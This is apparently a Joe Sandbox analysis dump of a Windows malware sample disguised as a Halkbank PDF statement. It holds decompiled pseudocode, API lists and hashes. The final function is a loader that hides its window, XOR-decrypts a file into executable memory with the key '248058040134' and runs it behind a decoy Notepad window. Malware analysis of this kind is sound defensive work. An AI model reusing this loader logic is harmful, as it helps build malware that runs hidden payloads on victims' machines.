                                                                    • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                    • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                    				int _v8;
                                                                    				long _t21;
                                                                    				long _t24;
                                                                    				char* _t30;
                                                                    
                                                                    				asm("sbb eax, eax");
                                                                    				_v8 = 0x800;
                                                                    				_t5 =  &_a4; // 0x422728
                                                                    				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                    				_t30 = _a16;
                                                                    				if(_t21 != 0) {
                                                                    					L4:
                                                                    					 *_t30 =  *_t30 & 0x00000000;
                                                                    				} else {
                                                                    					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                    					_t21 = RegCloseKey(_a20);
                                                                    					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                    					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                    						goto L4;
                                                                    					}
                                                                    				}
                                                                    				return _t21;
                                                                    			}







                                                                    0x00406544
                                                                    0x00406546
                                                                    0x0040655b
                                                                    0x0040655e
                                                                    0x00406563
                                                                    0x00406568
                                                                    0x004065a6
                                                                    0x004065a6
                                                                    0x0040656a
                                                                    0x0040657c
                                                                    0x00406587
                                                                    0x0040658d
                                                                    0x00406598
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406598
                                                                    0x004065ac

                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,?,?,0040679D,80000002), ref: 0040657C
                                                                    • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000000,00422728), ref: 00406587
                                                                    Strings
                                                                    • "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj, xrefs: 0040653D
                                                                    • ('B, xrefs: 0040655B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj$('B
                                                                    • API String ID: 3356406503-2100964056
                                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                    • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                    • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E00405F37(WCHAR* _a4) {
                                                                    				WCHAR* _t9;
                                                                    
                                                                    				_t9 = _a4;
                                                                    				_push( &(_t9[lstrlenW(_t9)]));
                                                                    				_push(_t9);
                                                                    				if( *(CharPrevW()) != 0x5c) {
                                                                    					lstrcatW(_t9, 0x40a014);
                                                                    				}
                                                                    				return _t9;
                                                                    			}




                                                                    0x00405f38
                                                                    0x00405f45
                                                                    0x00405f46
                                                                    0x00405f51
                                                                    0x00405f59
                                                                    0x00405f59
                                                                    0x00405f61

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-823278215
                                                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                    • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                    • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                    				int _t15;
                                                                    				long _t16;
                                                                    
                                                                    				_t15 = _a8;
                                                                    				if(_t15 != 0x102) {
                                                                    					if(_t15 != 0x200) {
                                                                    						_t16 = _a16;
                                                                    						L7:
                                                                    						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                                                    							_push(_t16);
                                                                    							_push(6);
                                                                    							 *0x423734 = _t16;
                                                                    							E00404FFF();
                                                                    						}
                                                                    						L11:
                                                                    						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                                                    					}
                                                                    					if(IsWindowVisible(_a4) == 0) {
                                                                    						L10:
                                                                    						_t16 = _a16;
                                                                    						goto L11;
                                                                    					}
                                                                    					_t16 = E00404F7F(_a4, 1);
                                                                    					_t15 = 0x419;
                                                                    					goto L7;
                                                                    				}
                                                                    				if(_a12 != 0x20) {
                                                                    					goto L10;
                                                                    				}
                                                                    				E00404610(0x413);
                                                                    				return 0;
                                                                    			}





                                                                    0x00405642
                                                                    0x0040564c
                                                                    0x00405668
                                                                    0x0040568a
                                                                    0x0040568d
                                                                    0x00405693
                                                                    0x0040569d
                                                                    0x0040569e
                                                                    0x004056a0
                                                                    0x004056a6
                                                                    0x004056a6
                                                                    0x004056b0
                                                                    0x00000000
                                                                    0x004056be
                                                                    0x00405675
                                                                    0x004056ad
                                                                    0x004056ad
                                                                    0x00000000
                                                                    0x004056ad
                                                                    0x00405681
                                                                    0x00405683
                                                                    0x00000000
                                                                    0x00405683
                                                                    0x00405652
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405659
                                                                    0x00000000

                                                                    APIs
                                                                    • IsWindowVisible.USER32 ref: 0040566D
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                      • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                    • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                    • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                    • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E00405F83(WCHAR* _a4) {
                                                                    				WCHAR* _t5;
                                                                    				WCHAR* _t7;
                                                                    
                                                                    				_t7 = _a4;
                                                                    				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                    				while( *_t5 != 0x5c) {
                                                                    					_push(_t5);
                                                                    					_push(_t7);
                                                                    					_t5 = CharPrevW();
                                                                    					if(_t5 > _t7) {
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				 *_t5 =  *_t5 & 0x00000000;
                                                                    				return  &(_t5[1]);
                                                                    			}





                                                                    0x00405f84
                                                                    0x00405f8e
                                                                    0x00405f91
                                                                    0x00405f97
                                                                    0x00405f98
                                                                    0x00405f99
                                                                    0x00405fa1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405fa1
                                                                    0x00405fa3
                                                                    0x00405fab

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F89
                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00405F99
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrlen
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 2709904686-1246513382
                                                                    • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                    • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                    • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                    • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                    				int _v8;
                                                                    				int _t12;
                                                                    				int _t14;
                                                                    				int _t15;
                                                                    				CHAR* _t17;
                                                                    				CHAR* _t27;
                                                                    
                                                                    				_t12 = lstrlenA(_a8);
                                                                    				_t27 = _a4;
                                                                    				_v8 = _t12;
                                                                    				while(lstrlenA(_t27) >= _v8) {
                                                                    					_t14 = _v8;
                                                                    					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                    					_t15 = lstrcmpiA(_t27, _a8);
                                                                    					_t27[_v8] =  *(_t14 + _t27);
                                                                    					if(_t15 == 0) {
                                                                    						_t17 = _t27;
                                                                    					} else {
                                                                    						_t27 = CharNextA(_t27);
                                                                    						continue;
                                                                    					}
                                                                    					L5:
                                                                    					return _t17;
                                                                    				}
                                                                    				_t17 = 0;
                                                                    				goto L5;
                                                                    			}









                                                                    0x004060cd
                                                                    0x004060cf
                                                                    0x004060d2
                                                                    0x004060fe
                                                                    0x004060d7
                                                                    0x004060e0
                                                                    0x004060e5
                                                                    0x004060f0
                                                                    0x004060f3
                                                                    0x0040610f
                                                                    0x004060f5
                                                                    0x004060fc
                                                                    0x00000000
                                                                    0x004060fc
                                                                    0x00406108
                                                                    0x0040610c
                                                                    0x0040610c
                                                                    0x00406106
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                    • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                    • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                    • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                    • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 267 8a08b7-8a09c0 call 8a005f call 8a0838 call 8a0073 * 8 289 8a09c2 267->289 290 8a09c7-8a09d7 267->290 291 8a0cb3-8a0cb6 289->291 293 8a09d9 290->293 294 8a09de-8a0a01 CreateFileW 290->294 293->291 295 8a0a08-8a0a2e VirtualAlloc ReadFile 294->295 296 8a0a03 294->296 297 8a0a30 295->297 298 8a0a35-8a0a48 295->298 296->291 297->291 300 8a0a4e-8a0c98 298->300 301 8a0c9d-8a0cac call 8a020a 298->301 304 8a0cae-8a0cb0 ExitProcess 301->304
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: AllocNumaVirtual
                                                                    • String ID:
                                                                    • API String ID: 4233825816-0
                                                                    • Opcode ID: 9398cf5ca5c8b20860002569b2d98f00a2946bef4f6343ae9c848b729b4f821e
                                                                    • Instruction ID: ae1d8fd5878fdd6822429591f29607cf009fd799bad792e7baa8bf66b15fec6d
                                                                    • Opcode Fuzzy Hash: 9398cf5ca5c8b20860002569b2d98f00a2946bef4f6343ae9c848b729b4f821e
                                                                    • Instruction Fuzzy Hash: 19D19620D4D2D8ADDF02CBE994557FDBFB0AF26201F1841C6E4E4F6283D636874A9B25
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 390 8a07da-8a0820 call 8a005f call 8a0073 GetSystemInfo 396 8a0829 390->396 397 8a0822-8a0825 390->397 398 8a082b-8a082e 396->398 397->398
                                                                    APIs
                                                                    • GetSystemInfo.KERNELBASE(?), ref: 008A07F7
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.329198450.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_8a0000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                    • Instruction ID: 6f9f76acef7cdc27a4aea4764274ba1900b7adc920a5196fcde5f42f10aaf336
                                                                    • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                    • Instruction Fuzzy Hash: 4BF0A771D1450CABEB08E6BC88457BE77ACEB09301F104579E616E2941D53885404AA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 78%
                                                                    			E004012C1(struct HWND__* __eax, void* __eflags, intOrPtr _a8) {
                                                                    				struct _WNDCLASSEXW _v52;
                                                                    				struct tagMONITORINFO _v100;
                                                                    				struct tagMSG _v128;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				void* _t35;
                                                                    				long _t37;
                                                                    				struct HWND__* _t39;
                                                                    				int _t46;
                                                                    				struct HMONITOR__* _t51;
                                                                    				struct HWND__* _t53;
                                                                    				int _t59;
                                                                    				int _t61;
                                                                    				int _t63;
                                                                    				intOrPtr _t68;
                                                                    				void* _t77;
                                                                    				signed int _t81;
                                                                    				char* _t82;
                                                                    				int _t84;
                                                                    				void* _t86;
                                                                    				long _t87;
                                                                    				struct HACCEL__* _t89;
                                                                    				void* _t91;
                                                                    				void* _t92;
                                                                    				int _t93;
                                                                    				signed int _t99;
                                                                    				void* _t108;
                                                                    
                                                                    				_t108 = __eflags;
                                                                    				__imp__GetConsoleWindow(_t86, _t91, _t77); // executed
                                                                    				ShowWindow(__eax, 0); // executed
                                                                    				_t35 = E00401716( *((intOrPtr*)(_a8 + 4)), "rb"); // executed
                                                                    				_push(2);
                                                                    				_t92 = _t35;
                                                                    				_push(0);
                                                                    				_push(_t92); // executed
                                                                    				E00401C17(0, _t86, _t92, _t108); // executed
                                                                    				_push(_t92); // executed
                                                                    				_t37 = E00401B28(0, _t86, _t92, _t108); // executed
                                                                    				_push(0);
                                                                    				_push(0);
                                                                    				_push(_t92);
                                                                    				_t87 = _t37; // executed
                                                                    				E00401C17(0, _t87, _t92, _t108); // executed
                                                                    				_t39 = VirtualAlloc(0, _t87, 0x3000, 0x40); // executed
                                                                    				_v128.hwnd = _t39;
                                                                    				E00401977(_t39, _t87, 1, _t92); // executed
                                                                    				_t81 = 0;
                                                                    				if(_t87 <= 0) {
                                                                    					L2:
                                                                    					_v128.hwnd();
                                                                    					__imp__#17();
                                                                    					 *0x40eda8 = RegisterWindowMessageW(L"commdlg_FindReplace");
                                                                    					E00403BB0(0x40ff20, 0, 0x11f4);
                                                                    					_t84 = 0x30;
                                                                    					 *0x40ff20 = 0;
                                                                    					_t93 = _t84;
                                                                    					_t82 =  &_v52;
                                                                    					do {
                                                                    						 *_t82 = 0;
                                                                    						_t82 = _t82 + 1;
                                                                    						_t93 = _t93 - 1;
                                                                    					} while (_t93 != 0);
                                                                    					_v52.cbSize = _t84;
                                                                    					_v52.lpfnWndProc = E004012BC;
                                                                    					_v52.hInstance = 0;
                                                                    					_v52.hIcon = LoadIconW(0, 0x300);
                                                                    					_t46 = GetSystemMetrics(0x32);
                                                                    					_v52.hIconSm = LoadImageW( *0x40ff20, 0x300, 1, GetSystemMetrics(0x31), _t46, 0x8000);
                                                                    					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                                    					_v52.hbrBackground = 6;
                                                                    					_v52.lpszMenuName = 0x201;
                                                                    					_v52.lpszClassName = L"Notepad";
                                                                    					_t51 = RegisterClassExW( &_v52);
                                                                    					if(_t51 != 0) {
                                                                    						__imp__MonitorFromRect(0x40edac, 1);
                                                                    						_v100.cbSize = 0x28;
                                                                    						GetMonitorInfoW(_t51,  &_v100);
                                                                    						__eflags =  *0x40ff24;
                                                                    						if( *0x40ff24 != 0) {
                                                                    							_t53 = E00401000(1);
                                                                    							__eflags = _t53;
                                                                    							if(_t53 != 0) {
                                                                    								SetWindowTextW( *0x40ff2c, 0x40bb5c);
                                                                    								SendMessageW( *0x40ff2c, 0xcd, 0, 0);
                                                                    								SetFocus( *0x40ff2c);
                                                                    							}
                                                                    							ShowWindow( *0x40ff24, 0);
                                                                    							UpdateWindow( *0x40ff24);
                                                                    							DragAcceptFiles( *0x40ff24, 1);
                                                                    							GetCommandLineW();
                                                                    							_t89 = LoadAcceleratorsW(0, 0x203);
                                                                    							while(1) {
                                                                    								_t59 = GetMessageW( &_v128, 0, 0, 0);
                                                                    								__eflags = _t59;
                                                                    								if(_t59 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								_t61 = IsDialogMessageW( *0x40ff28,  &_v128);
                                                                    								__eflags = _t61;
                                                                    								if(_t61 == 0) {
                                                                    									_t63 = TranslateAcceleratorW( *0x40ff24, _t89,  &_v128);
                                                                    									__eflags = _t63;
                                                                    									if(_t63 == 0) {
                                                                    										TranslateMessage( &_v128);
                                                                    										DispatchMessageW( &_v128);
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							_t68 = _v128.wParam;
                                                                    							goto L16;
                                                                    						}
                                                                    						ExitProcess(1);
                                                                    					} else {
                                                                    						_t68 = 0;
                                                                    						L16:
                                                                    						return _t68;
                                                                    					}
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_v128.message = _v128.hwnd + _t81;
                                                                    					asm("cdq");
                                                                    					_t99 = 0xc;
                                                                    					 *(_v128.message) =  *(_v128.message) ^  *("248058040134" + _t81 % _t99);
                                                                    					_t81 = _t81 + 1;
                                                                    				} while (_t81 < _t87);
                                                                    				goto L2;
                                                                    			}
































                                                                    0x004012c1
                                                                    0x004012d0
                                                                    0x004012d7
                                                                    0x004012e8
                                                                    0x004012ed
                                                                    0x004012ef
                                                                    0x004012f1
                                                                    0x004012f2
                                                                    0x004012f3
                                                                    0x004012fb
                                                                    0x004012fc
                                                                    0x00401302
                                                                    0x00401303
                                                                    0x00401304
                                                                    0x00401305
                                                                    0x00401307
                                                                    0x00401318
                                                                    0x00401323
                                                                    0x00401327
                                                                    0x0040132f
                                                                    0x00401333
                                                                    0x00401358
                                                                    0x00401358
                                                                    0x0040135c
                                                                    0x00401378
                                                                    0x0040137e
                                                                    0x0040138a
                                                                    0x0040138b
                                                                    0x00401390
                                                                    0x00401392
                                                                    0x00401396
                                                                    0x00401396
                                                                    0x00401398
                                                                    0x00401399
                                                                    0x00401399
                                                                    0x004013a3
                                                                    0x004013a7
                                                                    0x004013af
                                                                    0x004013c6
                                                                    0x004013ca
                                                                    0x004013e9
                                                                    0x004013f6
                                                                    0x004013ff
                                                                    0x00401407
                                                                    0x00401412
                                                                    0x0040141d
                                                                    0x00401426
                                                                    0x00401435
                                                                    0x00401441
                                                                    0x00401449
                                                                    0x0040144f
                                                                    0x00401455
                                                                    0x0040145e
                                                                    0x00401463
                                                                    0x00401465
                                                                    0x00401472
                                                                    0x00401485
                                                                    0x00401491
                                                                    0x00401491
                                                                    0x0040149e
                                                                    0x004014aa
                                                                    0x004014b7
                                                                    0x004014bd
                                                                    0x004014d5
                                                                    0x0040151a
                                                                    0x00401522
                                                                    0x00401524
                                                                    0x00401526
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004014e4
                                                                    0x004014ea
                                                                    0x004014ec
                                                                    0x004014fa
                                                                    0x00401500
                                                                    0x00401502
                                                                    0x00401509
                                                                    0x00401514
                                                                    0x00401514
                                                                    0x00401502
                                                                    0x004014ec
                                                                    0x00401528
                                                                    0x00000000
